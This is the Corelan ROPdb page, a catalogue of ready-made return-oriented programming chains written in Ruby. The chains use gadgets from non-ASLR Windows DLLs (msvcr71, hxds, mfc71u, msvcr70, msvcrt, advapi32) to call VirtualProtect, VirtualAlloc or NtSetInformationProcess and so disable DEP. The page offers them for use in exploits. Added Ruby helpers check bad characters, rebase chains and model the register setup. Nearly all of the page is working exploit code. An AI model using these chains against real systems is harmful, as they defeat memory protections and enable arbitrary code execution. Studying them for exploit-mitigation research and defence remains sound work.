Corelan ROPdb

This page gathers generic/universal ROP chains that are solely based on gadgets taken from a single dll.

The main requirements for a ROP chain to be listed here are:

  • it must work on Windows XP, Vista, 7, Server 2003 and Server 2008 (the dll must not rebase and must not be ASLR enabled). If your ROP chain only works on one of the listed operating systems, it must be based on a commonly used module.
  • the chain should be null-byte free (unless it is a commonly used module whose address range itself contains null bytes). Chains that contain null bytes (or other bad chars) may of course be shorter.
  • the chain should work without any particular setup in terms of preparing registers, and must not assume that a register already contains a given value.
  • you must be the original author of the chain

Ideally, the dll should not be application specific, unless it is shipped with a major application and/or can be loaded on demand, for instance from a web browser.

If you want to submit your own chain, include details about the module (name, version, applications it is shipped with) and indicate if and how the dll can be loaded on demand (if applicable).

Write your chain in the format shown below (ruby) and send it to peter [dot] ve {at} corelan [dot] be

Feel free to use the chains below in your exploits, just don't forget to credit the original author(s).
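The null-byte requirement and the two listing formats used on this page (absolute dwords, as in the msvcr71.dll chains, and base + offset, as in the hxds.dll chain) can both be checked mechanically. The Ruby below is an added example and is not part of the ROPdb or of mona.py; the sample chain is constructed from a few dwords inside the msvcr71.dll address range (0x7c340000-0x7c396000) plus two immediates, and is not one of the listed chains.

```ruby
# Added example, not part of the Corelan ROPdb listing.

# Pack a chain the way the listings do ("V*") and report every dword that
# contains a bad byte. Returns an array of [index, dword] pairs.
def bad_char_dwords(chain, bad = [0x00])
  hits = []
  chain.each_with_index do |dword, i|
    bytes = [dword].pack("V").bytes
    hits << [i, dword] if bytes.any? { |b| bad.include?(b) }
  end
  hits
end

# Convert an absolute chain into the base-relative form used by the hxds.dll
# listing: every dword inside [base, top) becomes an offset, everything else
# (negated constants, nops, junk) stays an immediate value.
def relativize(chain, base, top)
  chain.map do |dword|
    if dword >= base && dword < top
      [:offset, dword - base]
    else
      [:imm, dword]
    end
  end
end

# Resolve a relativized chain against a (possibly different) module base.
def rebase(rel_chain, new_base)
  rel_chain.map { |kind, v| kind == :offset ? new_base + v : v }
end

# Emit Ruby source in the listing format, ready to paste into a
# create_rop_chain(base) function.
def to_ruby(rel_chain, base_var = "base")
  lines = rel_chain.map do |kind, v|
    kind == :offset ? format("\t%s + 0x%08x,", base_var, v) : format("\t0x%08x,", v)
  end
  "[\n#{lines.join("\n")}\n].pack(\"V*\")"
end

# Constructed sample: three gadget addresses inside the msvcr71.dll range and
# two immediates, one of which (0x00000201) contains null bytes.
SAMPLE_CHAIN = [0x7c37653d, 0xfffffdff, 0x7c351e05, 0x00000201, 0x7c378c81]
SAMPLE_BASE  = 0x7c340000
SAMPLE_TOP   = 0x7c396000

if __FILE__ == $0
  p bad_char_dwords(SAMPLE_CHAIN)
  puts to_ruby(relativize(SAMPLE_CHAIN, SAMPLE_BASE, SAMPLE_TOP), "base_msvcr71_dll")
end
```

The bad-char set defaults to the null byte only; pass the full bad-char list of the target (for instance `[0x00, 0x0a, 0x0d]`) to see which gadgets would need replacing. A relativized chain only remains valid on a different base if the module is the same build, since the offsets are build specific.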


msvcr71.dll – v7.10.3052.4

  • Shipped with : JRE (Java) 1.6
  • works on : XP/Vista/Win7/2003/2008
  • Load on demand in browser : YES
  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x7c340000
  • Top : 0x7c396000
  • Size : 0x56000
  • Technique : kernel32.VirtualProtect()
  • Author : corelanc0d3r

Updated (smaller) chain (October 2011):

rop_gadgets = 
[
	0x7c37653d, 	# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	0xfffffdff,	# -> EAX: value to negate, will become 0x00000201 (dwSize)
	0x7c347f98,	# -> EDI: RETN (ROP NOP) [msvcr71.dll]
	0x7c3415a2,	# -> ESI: JMP [EAX] [msvcr71.dll]
	0xffffffff,	# -> EBX: becomes 0x00000000 after the INC EBX below
	0x7c376402,	# -> EBP: POP EBP # RETN, skip 4 bytes (return address for VirtualProtect) [msvcr71.dll]
	0x7c351e05,	# NEG EAX # RETN [msvcr71.dll] 
	0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll] 
	0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
	0x7c344f87,	# POP EDX # RETN [msvcr71.dll] 
	0xffffffc0,	# Value to negate, will become 0x00000040
	0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll] 
	0x7c34d201,	# POP ECX # RETN [msvcr71.dll] 
	0x7c38b001,	# &Writable location [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
	0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] (ADD AL,0EF below wraps AL to 0x40 -> 0x7c37a140, the IAT slot read by JMP [EAX])
	0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
	0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
	# rop chain generated with mona.py
].pack("V*")

(18 dwords)

 

Older (bigger) chain:

rop_gadgets =
[
	0x7c376402,	# POP EBP # RETN [msvcr71.dll] 
	0x7c376402,	# skip 4 bytes [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
	0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
	0x7c351e05,	# NEG EAX # RETN [msvcr71.dll] 
	0x7c354901,	# POP EBX # RETN [msvcr71.dll] 
	0xffffffff,	# -> EBX: becomes 0x00000000 after the INC EBX below
	0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll] 
	0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
	0x7c344f87,	# POP EDX # RETN [msvcr71.dll] 
	0xffffffc0,	# Value to negate, will become 0x00000040
	0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll] 
	0x7c34d201,	# POP ECX # RETN [msvcr71.dll] 
	0x7c38b001,	# &Writable location [msvcr71.dll]
	0x7c34b8d7,	# POP EDI # RETN [msvcr71.dll] 
	0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
	0x7c364802,	# POP ESI # RETN [msvcr71.dll] 
	0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll] 
	0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] (ADD AL,0EF below wraps AL to 0x40 -> 0x7c37a140, the IAT slot read by JMP [EAX])
	0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
	0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
	# rop chain generated with mona.py
].pack("V*")

(22 dwords)


hxds.dll – v2.05.50727.4039

  • Shipped with : MS Office 2010
  • works on : XP/Vista/Win7/2003/2008
  • Load on demand in browser : YES  ( http://www.greyhathacker.net/?p=585 )
  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x51BD0000
  • Top : 0x51CA7000
  • Size : 0xd7000
  • Technique : kernel32.VirtualProtect()
def create_rop_chain(base_hxds_dll)
	# rop chain generated with mona.py - www.corelan.be
	# (parameter renamed from base_hxds.dll, which is not a valid Ruby identifier;
	#  pass the module base, 0x51BD0000 when the dll is loaded at its preferred base)
	rop_gadgets = 
	[
		base_hxds_dll + 0x00074533,	# POP ESI # RETN [hxds.dll] 
		base_hxds_dll + 0x000010b8,	# ptr to &VirtualProtect() [IAT hxds.dll]
		base_hxds_dll + 0x00002d97,	# MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] 
		base_hxds_dll + 0x0000cba0,	# XCHG EAX,ESI # RETN 00 [hxds.dll] 
		base_hxds_dll + 0x0006a894,	# POP EBP # RETN [hxds.dll] 
		base_hxds_dll + 0x0002c595,	# & call esp [hxds.dll]
		base_hxds_dll + 0x00076452,	# POP EAX # RETN [hxds.dll] 
		0xa17ffdfe,                	# put delta into eax (-> put 0x00000201 into ebx)
		base_hxds_dll + 0x00041e01,	# ADD EAX,5E800403 # RETN [hxds.dll] 
		base_hxds_dll + 0x0002e67b,	# ADD EBX,EAX # XOR EAX,EAX # RETN [hxds.dll] 
		base_hxds_dll + 0x00076452,	# POP EAX # RETN [hxds.dll] 
		0xa17ffc3d,                	# put delta into eax (-> put 0x00000040 into edx)
		base_hxds_dll + 0x00041e01,	# ADD EAX,5E800403 # RETN [hxds.dll] 
		base_hxds_dll + 0x0002592b,	# XCHG EAX,EDX # RETN [hxds.dll] 
		base_hxds_dll + 0x00017be7,	# POP ECX # RETN [hxds.dll] 
		base_hxds_dll + 0x000906e7,	# &Writable location [hxds.dll]
		base_hxds_dll + 0x0002dd01,	# POP EDI # RETN [hxds.dll] 
		base_hxds_dll + 0x00013a03,	# RETN (ROP NOP) [hxds.dll]
		base_hxds_dll + 0x00074707,	# POP EAX # RETN [hxds.dll] 
		0x90909090,                	# nop
		base_hxds_dll + 0x0000a8dc,	# PUSHAD # POP ECX # RETN [hxds.dll] 
	].flatten.pack("V*")
	return rop_gadgets
end

mfc71u.dll – v7.10.3077.0

  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x7c250000
  • Top : 0x7c352000
  • Size : 0x102000
  • Technique : kernel32.VirtualProtect()
  • Author : corelanc0d3r
rop_gadgets =
	[
	0x7c259e0c,	# POP ECX # RETN (MFC71U.DLL)
	0x7c2512f0,	# <- *&VirtualProtect()
	0x7c2fe7bc,	# MOV EAX,DWORD PTR DS:[ECX] # RETN (MFC71U.DLL)
	0x7c26f014,	# XCHG EAX,ESI # RETN (MFC71U.DLL)
	0x7c2c0809,	# POP EBP # RETN (MFC71U.DLL)
	0x7c289989,	# ptr to 'jmp esp' (from MFC71U.DLL)
	0x7c259e0c,	# POP ECX # RETN (MFC71U.DLL)
	0x7c32b001,	# RW pointer (lpOldProtect) (-> ecx)
	0x7c2de810,	# POP EDI # RETN (MFC71U.DLL)
	0x7c2de811,	# ROP NOP (-> edi)
	0x7c284862,	# POP EAX # RETN (MFC71U.DLL)
	0xffffffc0,	# value to negate, target 0x00000040, -> reg : edx, via ebx
	0x7c252ea0,	# NEG EAX # RETN (MFC71U.DLL)
	0x7c316b89,	# XCHG EAX,EBX # RETN (MFC71U.DLL)
	0x7c288c52,	# XOR EDX,EDX # RETN (MFC71U.DLL)
	0x7c265297,	# ADD EDX,EBX # POP EBX # RETN 10 (MFC71U.DLL)
	0x41414141,	# EBX
	0x7c284862,	# POP EAX # RETN (MFC71U.DLL)
	0x41414141,
	0x41414141,
	0x41414141,
	0x41414141, 	# compensate for RETN 10
	0xfffffdff,	# value to negate, target 0x00000201, target reg : ebx
	0x7c252ea0,	# NEG EAX # RETN (MFC71U.DLL)
	0x7c316b89,	# XCHG EAX,EBX # RETN (MFC71U.DLL) (dwSize)
	0x7c284862,	# POP EAX # RETN (MFC71U.DLL)
	0x90909090,	# NOPS (-> eax)
	0x7c2838ef,	# PUSHAD # RETN (MFC71U.DLL)
	# rop chain generated with mona.py
	].pack("V*")

 

msvcr70.dll – v7.00.9466.0

  • Tested on: XP/Win7
  • Rebase : False
  • ASLR : False
  • Safeseh : False
  • Base : 0x7c000000
  • Top : 0x7c054000
  • Size : 0x00054000
  • Technique : kernel32.VirtualProtect()
  • Author : b33f (Ruben Boonen) – www.fuzzysecurity.com
rop_gadgets = 
[
	0x7c032c80, # XOR EAX,EAX # RETN
	0x7c0126bc, # XCHG EAX,EBP # ADD AL,7C # RETN
	0x7c026652, # POP ESI # RETN
	0xffffffff, # will be 0x00000000
	0x7c03063f, # INC ESI # RETN
	0x7c0358a1, # POP EAX # RETN
	0x7C0390FD, # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B
	0x7c023a4f, # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN
	0x7c0358a1, # POP EAX # RETN
	0x83FF5E94, # neg -> 0x7c00a16c : push esp #  ret
	0x7c0167cd, # NEG EAX # RETN
	0x7c0126b7, # XCHG EAX,EBP # ADD AL,7C # RETN
	0x7c03028f, # POP EBX # RETN
	0xffffffff, # will be 0x00000000
	0x7c01cd53, # INC EBX # XOR AL,AL # RETN
	0x7c0358a1, # POP EAX # RETN
	0xFFFFFDFF, # Neg is 201-HEX (513-bytes)
	0x7c0167cd, # NEG EAX # RETN
	0x7c01561c, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
	0x7c026484, # POP EDI # RETN
	0x7c034e02, # ROP-NOP
	0x7c0358a1, # POP EAX # RETN
	0xFFFFFFC0, # NEG is 0x40
	0x7c0167cd, # NEG EAX # RETN
	0x7c026dc4, # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN
	0x7c034e01, # POP ECX # RETN
	0x7c049001, # lpOldProtect
	0x7c0358a1, # POP EAX # RETN
	0x90909090, # NOP
	0x7c0126b6, # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN
].pack("V*")

 

 


Less generic chains


msvcrt.dll – v7.0.2600.5512 (XP)

  • Rebase: False
  • ASLR: False
  • Safeseh : True
  • Base: 0x77c10000
  • Top: 0x77c68000
  • Size: 0x00058000
  • works on: XP
  • Technique: kernel32.VirtualProtect() and kernel32.VirtualAlloc()

VirtualProtect (NOT null-byte free)

rop_gadgets = 
	[
	0x77c364d5,	# POP EBP # RETN [msvcrt.dll] 
	0x77c364d5,	# skip 4 bytes [msvcrt.dll]
	0x77c46e91,	# POP EBX # RETN [msvcrt.dll] 
	0x00000201,	# 0x00000201-> ebx
	0x77c4cbf9,	# POP EDX # RETN [msvcrt.dll] 
	0x00000040,	# 0x00000040-> edx
	0x77c2c343,	# POP ECX # RETN [msvcrt.dll] 
	0x77c605b5,	# &Writable location [msvcrt.dll]
	0x77c23b47,	# POP EDI # RETN [msvcrt.dll] 
	0x77c39f92,	# RETN (ROP NOP) [msvcrt.dll]
	0x77c34d9a,	# POP ESI # RETN [msvcrt.dll] 
	0x77c2aacc,	# JMP [EAX] [msvcrt.dll]
	0x77c21d16,	# POP EAX # RETN [msvcrt.dll] 
	0x77c11120,	# ptr to &VirtualProtect() [IAT msvcrt.dll]
	0x77c12df9,	# PUSHAD # RETN [msvcrt.dll] 
	0x77c35524,	# ptr to 'push esp #  ret ' [msvcrt.dll]
	# rop chain generated with mona.py
	].pack("V*")

VirtualAlloc: (NOT null-byte free)

rop_gadgets = 
	[
	0x77c30ae3,	# POP EBP # RETN [msvcrt.dll] 
	0x77c30ae3,	# skip 4 bytes [msvcrt.dll]
	0x77c461c1,	# POP EBX # RETN [msvcrt.dll] 
	0x00000001,	# 0x00000001-> ebx
	0x77c4cdec,	# POP EDX # RETN [msvcrt.dll] 
	0x00001000,	# 0x00001000-> edx
	0x77c3eb23,	# POP ECX # RETN [msvcrt.dll] 
	0x00000040,	# 0x00000040-> ecx
	0x77c3048a,	# POP EDI # RETN [msvcrt.dll] 
	0x77c39f92,	# RETN (ROP NOP) [msvcrt.dll]
	0x77c4c1d1,	# POP ESI # RETN [msvcrt.dll] 
	0x77c2aacc,	# JMP [EAX] [msvcrt.dll]
	0x77c4e392,	# POP EAX # RETN [msvcrt.dll] 
	0x77c1110c,	# ptr to &VirtualAlloc() [IAT msvcrt.dll]
	0x77c12df9,	# PUSHAD # RETN [msvcrt.dll] 
	0x77c354b4,	# ptr to 'push esp #  ret ' [msvcrt.dll]
	# rop chain generated with mona.py
	].pack("V*")

msvcrt.dll – v7.0.3790.3959 (Windows 2003 SP1 & SP2)

  • OS Module
  • Chain works on : Windows 2003 SP1 & SP2
  • Technique : kernel32.VirtualProtect()
 

rop_gadgets =
	[
	0x77bb2563, # POP EAX # RETN
	0x77ba1114, # <- *&VirtualProtect()
	0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
	0x41414141, # junk (-> EBP, overwritten below)
	0x77bb0c86, # XCHG EAX,ESI # RETN
	0x77bc9801, # POP EBP # RETN
	0x77be2265, # ptr to 'push esp #  ret'
	0x77bb2563, # POP EAX # RETN
	0x03C0990F,
	0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
	0x77bb48d3, # POP EBX, RET
	0x77bf21e0, # .data (writable, absorbs the ADD BYTE PTR below)
	0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
	0x77bbfc02, # POP ECX # RETN
	0x77bef001, # W pointer (lpOldProtect) (-> ecx)
	0x77bd8c04, # POP EDI # RETN
	0x77bd8c05, # ROP NOP (-> edi)
	0x77bb2563, # POP EAX # RETN
	0x03c0944f,
	0x77bdd441, # SUB EAX, 03c0940f  (0x40 = PAGE_EXECUTE_READWRITE)
	0x77bb8285, # XCHG EAX,EDX # RETN
	0x77bb2563, # POP EAX # RETN
	0x90909090, # nop (-> EAX)
	0x77be6591, # PUSHAD # ADD AL,0EF # RETN
	].pack("V*")

advapi32.dll – 5.1.2600.5755

  • OS Module
  • Chain works on : XP (SP3)
  • Rebase : False
  • ASLR : False
  • Safeseh : True
  • Base : 0x77dd0000
  • Top : 0x77e6b000
  • Size : 0x9b000
  • Technique : ntdll.ZwSetInformationProcess()
  • Author : corelanc0d3r
rop_gadgets = 
	[
	0x77e25c1f, # POP EAX # RETN
	0x77dd1404, # * &NtSetInformationProcess
	0x77dfd448, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04 
	0xffffffff, # (EBP)
	0x77e18a5f, # INC EBP # RETN (set EBP to 0)
	0x41414141, # junk (compensate for RETN 04)
	0x77e01143, # XOR EBP,EAX # RETN (EBP = &NtSetInformationProcess)
	0x77e25c1f, # POP EAX # RETN 
	0xffffffde, # -> 0x22 (ProcessExecuteFlags) -> EDX
	0x77dd9b16, # NEG EAX # RETN 
	0x77df563a, # XCHG EAX,EBX # RETN 
	0x77de97ac, # MOV EDX,EBX # POP ESI # POP EBX # RETN 10 
	0x77e3cb79, # RETN -> ESI
	0xffffffff, # -> EBX (ProcessHandle = -1, current process)
	0x77ddbf44, # POP ECX # RETN 
	0x41414141, # compensate
	0x41414141, # compensate
	0x41414141, # compensate
	0x41414141, # compensate
	0x77e4b1fc, # ptr to 0x02 (MEM_EXECUTE_OPTION_ENABLE) -> ECX (ProcessInformation)
	0x77e25c1f, # POP EAX # RETN
	0xfffffffc, # -> 0x4 (ProcessInformationLength)
	0x77dd9b16, # NEG EAX # RETN
	0x77e3cb78, # POP EDI # RETN	
	0x77e3cb79, # RETN
	0x77de75ed, # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN 
	].pack("V*")

Note : the IAT entry in advapi32.dll (NtSetInformationProcess() at 0x77dd1404) is static on all versions of XP. The call (ProcessExecuteFlags = 0x22 with MEM_EXECUTE_OPTION_ENABLE = 0x2) turns DEP off for the current process, so the saved ESP can serve directly as the return address; it only succeeds if DEP has not been made permanent for that process.
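Both the VirtualProtect() chains above and the advapi32.dll ZwSetInformationProcess() chain end in PUSHAD; the differences between them are the constants loaded into the registers and how many ROP NOPs sit in EDI/ESI before the API entry, which shifts where the return address and the arguments land. The Ruby below is an added example (not part of the ROPdb or of mona.py) that models the 32-bit arithmetic the gadgets use, the AL-only fixup of the IAT pointer in the msvcr71.dll chain, and the walk through the eight saved registers. The register values come from the chain comments; the stack address 0x0012f000 and the NtSetInformationProcess address 0x7c90e000 are constructed placeholders.

```ruby
# Added example, not part of the Corelan ROPdb listing or of mona.py.

MASK32 = 0xffffffff

# NEG EAX / NEG EDX gadgets: two's-complement negate in 32 bits.
def neg32(v)
  (-v) & MASK32
end

# ADD EAX,imm32 (hxds.dll chain) and SUB EAX,imm32 (msvcrt.dll 2003 chain), with wrap-around.
def add32(a, b)
  (a + b) & MASK32
end

def sub32(a, b)
  (a - b) & MASK32
end

# ADD AL,imm8 (PUSHAD # ADD AL,0EF # RETN): only the low byte of EAX changes,
# the carry out of AL is dropped.
def add_al(eax, imm8)
  (eax & 0xffffff00) | ((eax + imm8) & 0xff)
end

# PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI in that order, so read
# from the lowest address upwards the frame is EDI first and EAX last. The saved
# ESP is the value ESP had before the push, i.e. the address of the dword that
# follows the PUSHAD gadget in the chain.
PUSHAD_FRAME_ORDER = [:edi, :esi, :ebp, :esp, :ebx, :edx, :ecx, :eax]

def pushad_frame(regs)
  PUSHAD_FRAME_ORDER.map { |r| regs.fetch(r) }
end

# Follow the RETN that ends the PUSHAD gadget: each slot holding a ROP NOP is
# eaten by a RETN, the first slot holding an API entry (or the JMP [EAX] that
# reaches it) is the call, the next slot is the API's return address and the
# following nargs slots are its stdcall arguments.
def walk_pushad_frame(frame, rop_nops, api_entries, nargs)
  i = 0
  i += 1 while i < frame.length && rop_nops.include?(frame[i])
  raise "no API entry found in PUSHAD frame" unless api_entries.include?(frame[i])
  {
    api:         frame[i],
    return_addr: frame[i + 1],
    args:        frame[i + 2, nargs],
    leftover:    frame.drop(i + 2 + nargs),
  }
end

# Registers just before "PUSHAD # ADD AL,0EF # RETN" in the msvcr71.dll chain
# (ESP is a constructed stack address).
MSVCR71_REGS = {
  eax: add_al(0x7c37a151, 0xef),   # 0x7c37a140, the IAT slot JMP [EAX] reads
  ebx: neg32(0xfffffdff),          # 0x201: INC EBX (0) then ADD EBX,EAX
  ecx: 0x7c38b001,                 # writable dword for lpOldProtect
  edx: neg32(0xffffffc0),          # 0x40 = PAGE_EXECUTE_READWRITE
  esi: 0x7c3415a2,                 # JMP [EAX]
  edi: 0x7c347f98,                 # RETN (ROP NOP)
  ebp: 0x7c376402,                 # POP EBP # RETN, VirtualProtect's return address
  esp: 0x0012f000,                 # constructed
}

def msvcr71_virtualprotect_call
  call = walk_pushad_frame(pushad_frame(MSVCR71_REGS), [0x7c347f98], [0x7c3415a2], 4)
  args = Hash[[:lpAddress, :dwSize, :flNewProtect, :lpOldProtect].zip(call[:args])]
  args.merge(return_addr: call[:return_addr], skipped_by_pop_ebp: call[:leftover])
end

# Registers before "PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN" in the advapi32.dll
# chain. EDI and ESI both hold a plain RETN, so the saved ESP becomes the return
# address and EBX, EDX, ECX, EAX become the four arguments.
NTSIP_ADDR = 0x7c90e000            # constructed stand-in for the resolved NtSetInformationProcess
ADVAPI32_REGS = {
  eax: neg32(0xfffffffc),          # 4 -> ProcessInformationLength
  ebx: 0xffffffff,                 # -1 -> current process handle
  ecx: 0x77e4b1fc,                 # ptr to dword 0x2 (MEM_EXECUTE_OPTION_ENABLE) -> ProcessInformation
  edx: neg32(0xffffffde),          # 0x22 = ProcessExecuteFlags -> ProcessInformationClass
  esi: 0x77e3cb79,                 # RETN
  edi: 0x77e3cb79,                 # RETN
  ebp: NTSIP_ADDR,
  esp: 0x0012f000,                 # constructed
}

def advapi32_ntsip_call
  call = walk_pushad_frame(pushad_frame(ADVAPI32_REGS), [0x77e3cb79], [NTSIP_ADDR], 4)
  names = [:ProcessHandle, :ProcessInformationClass, :ProcessInformation, :ProcessInformationLength]
  Hash[names.zip(call[:args])].merge(return_addr: call[:return_addr])
end
```

walk_pushad_frame raises when the first non-NOP slot is not a known API entry, which is the usual symptom of a POP landing in the wrong register after a chain has been edited by hand. The deltas in the hxds.dll chain (ADD EAX,5E800403 on 0xa17ffdfe and 0xa17ffc3d) and in the msvcrt.dll 2003 chain (SUB EAX,03C0940F on 0x03C0990F and 0x03c0944f) can be checked with add32 and sub32 in the same way, and give 0x201/0x40 and 0x500/0x40 respectively.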

